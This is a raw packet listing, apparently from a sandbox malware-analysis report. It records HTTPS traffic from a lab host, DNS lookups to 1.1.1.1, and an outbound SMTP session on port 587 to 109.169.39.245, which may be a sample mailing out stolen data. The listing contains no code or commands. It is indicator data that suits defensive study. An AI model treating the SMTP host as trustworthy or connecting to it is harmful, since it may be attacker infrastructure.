                                              Sep 28, 2021 13:02:14.484067917 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.484102964 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.484262943 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.484525919 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.484714031 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.484745026 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.484894991 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.485066891 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.485233068 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.485250950 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.485281944 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.485399008 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.485419989 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.486248970 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.486407042 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.486465931 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.486498117 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.486516953 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.486565113 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.486645937 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.486902952 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.487056971 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.487067938 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.487088919 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.487196922 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.487215042 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.487687111 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.487839937 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.487840891 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.487871885 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.487989902 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.488008976 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.489702940 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.489877939 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.489921093 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.489944935 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.490051031 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.490073919 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.490093946 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.490276098 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.490312099 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.490343094 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.490473986 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.490489960 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.490514994 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.490747929 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.491060019 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.491226912 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.491269112 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.491291046 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.491432905 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.491465092 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.491488934 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.491729975 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.491904974 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.492082119 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.492085934 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.492125034 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.492254019 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.492275000 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.492290020 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.492434025 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.492778063 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.492983103 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.492995024 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.493030071 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.493165970 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.493199110 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.493227959 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.493360996 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.493748903 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.493938923 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.493974924 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.494054079 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.494127035 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.494154930 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.494268894 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.494287968 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.494637966 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.494817972 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.494843006 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.494894981 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.495018005 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.495039940 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.495058060 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.495284081 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.495404959 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.495570898 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.495613098 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.495650053 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.495719910 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.495799065 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.495815039 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.496021986 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.496356010 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.496529102 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.496566057 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.496601105 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.496670961 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.496759892 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.496777058 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.496916056 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.497340918 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.497510910 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.497540951 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.497571945 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.497653961 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.497706890 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.497720003 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.497869968 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.498217106 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.498400927 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.498449087 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.498476028 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.498548985 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.498631954 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.498667002 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.498692989 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.498703003 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.498893976 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.499092102 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.499263048 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.499308109 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.499346972 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.499366045 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.499428034 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.499515057 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.499540091 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.499564886 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.499749899 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.499990940 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500149965 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.500179052 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500272989 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500314951 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.500335932 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500416040 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.500436068 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500478029 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.500497103 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500586033 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.500614882 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500649929 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.500672102 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500777960 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500848055 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.500869036 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.500969887 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501086950 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501179934 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501208067 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.501255035 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501307011 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.501399040 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.501440048 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501625061 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.501668930 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501813889 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.501827002 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501876116 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.501957893 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.501983881 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502003908 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502160072 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502178907 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502280951 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502326012 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502357960 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502445936 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502521992 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502533913 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502547979 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502573967 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502674103 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502687931 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502701998 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502846956 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.502861977 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502880096 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.502993107 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503015995 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503038883 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503197908 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503223896 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503333092 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503417969 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503439903 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503504038 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503526926 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503599882 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503618002 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503698111 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503709078 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503791094 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503810883 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503864050 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503899097 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.503953934 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.503978968 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504060984 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504132032 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504138947 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504158020 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504296064 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504317999 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504331112 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504347086 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504487038 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504506111 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504524946 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504542112 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504684925 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504726887 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504750013 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.504825115 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504905939 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.504924059 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505091906 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.505111933 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505240917 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.505270958 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505278111 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.505292892 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505297899 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.505311012 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505445957 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.505553007 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505728960 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.505745888 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505763054 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.505897999 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.505924940 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506048918 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506134033 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506158113 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506175995 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506206036 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506304979 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506313086 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506314039 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506335020 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506479979 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506509066 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506530046 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506634951 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506664991 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506736040 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506753922 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506769896 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.506846905 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506923914 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506939888 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.506963015 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507103920 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507129908 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507137060 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507152081 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507256031 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507304907 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507316113 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507328987 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507494926 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507515907 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507662058 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507687092 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507813931 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507836103 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507841110 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507853985 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.507957935 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507972002 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.507996082 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.508111954 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.508203030 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.508233070 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:03:50.175822973 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.194940090 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.195190907 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.215318918 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.215816975 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.235476017 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.235780001 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.272535086 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.279819012 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.307831049 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.307898998 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.307948112 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.307984114 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.308141947 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.309533119 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.313460112 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.334080935 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.388484001 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.470958948 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.490211964 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.491904020 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.512092113 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.512597084 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.537055016 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.537662029 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.557243109 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.557658911 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.578252077 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.578608036 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.598829985 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.653614998 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.653637886 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.653695107 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.653701067 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:03:50.672823906 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.672846079 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.673235893 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.686750889 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:03:50.732150078 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:05:30.132404089 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:05:30.152806997 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:05:30.152856112 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:05:30.153063059 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:05:30.153434038 CEST49748587192.168.11.20109.169.39.245
                                              Sep 28, 2021 13:05:30.154298067 CEST58749748109.169.39.245192.168.11.20
                                              Sep 28, 2021 13:05:30.154511929 CEST49748587192.168.11.20109.169.39.245

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 28, 2021 13:01:24.153304100 CEST5486453192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:24.162718058 CEST53548641.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:24.280258894 CEST5977953192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:24.350070000 CEST53597791.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:25.142340899 CEST5598853192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:25.151146889 CEST53559881.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:25.642889023 CEST5402753192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:25.651279926 CEST53540271.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:26.385423899 CEST6425753192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:26.394272089 CEST53642571.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:26.572901964 CEST5470653192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:26.582103968 CEST53547061.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:27.320261002 CEST5007953192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:27.329226971 CEST53500791.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:34.175177097 CEST4926553192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:34.183306932 CEST53492651.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:35.333899975 CEST4984053192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:35.342751980 CEST53498401.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:36.095288038 CEST6117253192.168.11.201.1.1.1
